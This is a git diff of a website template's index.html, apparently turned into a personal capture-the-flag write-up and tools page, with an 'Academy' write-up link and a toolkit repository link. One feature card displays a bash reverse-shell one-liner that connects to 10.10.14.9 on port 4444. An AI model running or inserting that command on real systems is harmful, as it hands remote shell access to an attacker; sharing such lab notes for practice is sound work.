--- a/index.html
+++ b/index.html
@@ -20,8 +20,8 @@
 					<nav>
 						<ul>
 							<li><a href="#intro">Welcome</a></li>
-							<li><a href="#one">Who we are</a></li>
-							<li><a href="#two">What we do</a></li>
+							<li><a href="#one">Write-ups</a></li>
+							<li><a href="#two">Tools</a></li>
 							<li><a href="#three">Get in touch</a></li>
 						</ul>
 					</nav>
@@ -45,11 +45,11 @@
 				<!-- One -->
 					<section id="one" class="wrapper style2 spotlights">
 						<section>
-							<a href="#" class="image"><img src="images/pic01.jpg" alt="" data-position="center center" /></a>
+							<a href="#" class="image"><img src="images/academy.png" alt="" data-position="center center" /></a>
 							<div class="content">
 								<div class="inner">
-									<h2>Untitled</h2>
-									<p>Untitled</p>
+									<h2>Academy</h2>
+									<p>Academy Write-up</p>
 									<ul class="actions">
 										<li><a href="generic.html" class="button">Learn more</a></li>
 									</ul>
@@ -90,13 +90,13 @@
 							<div class="features">
 								<section>
 									<span class="icon solid major fa-code"></span>
-									<h3>Lorem ipsum amet</h3>
-									<p>Untitled</p>
+									<h3>Bash Reverse Shell</h3>
+									<p>bash -i >& /dev/tcp/10.10.14.9/4444 0>&1</p>
 								</section>
 								<section>
 									<span class="icon solid major fa-lock"></span>
-									<h3>Aliquam sed nullam</h3>
-									<p>Untitled</p>
+									<h3>Toolkit</h3>
+									<a href="https://github.com/cyb3rchad/toolkit.git">Toolkit Repoistory</a>
 								</section>
 								<section>
 									<span class="icon solid major fa-cog"></span>
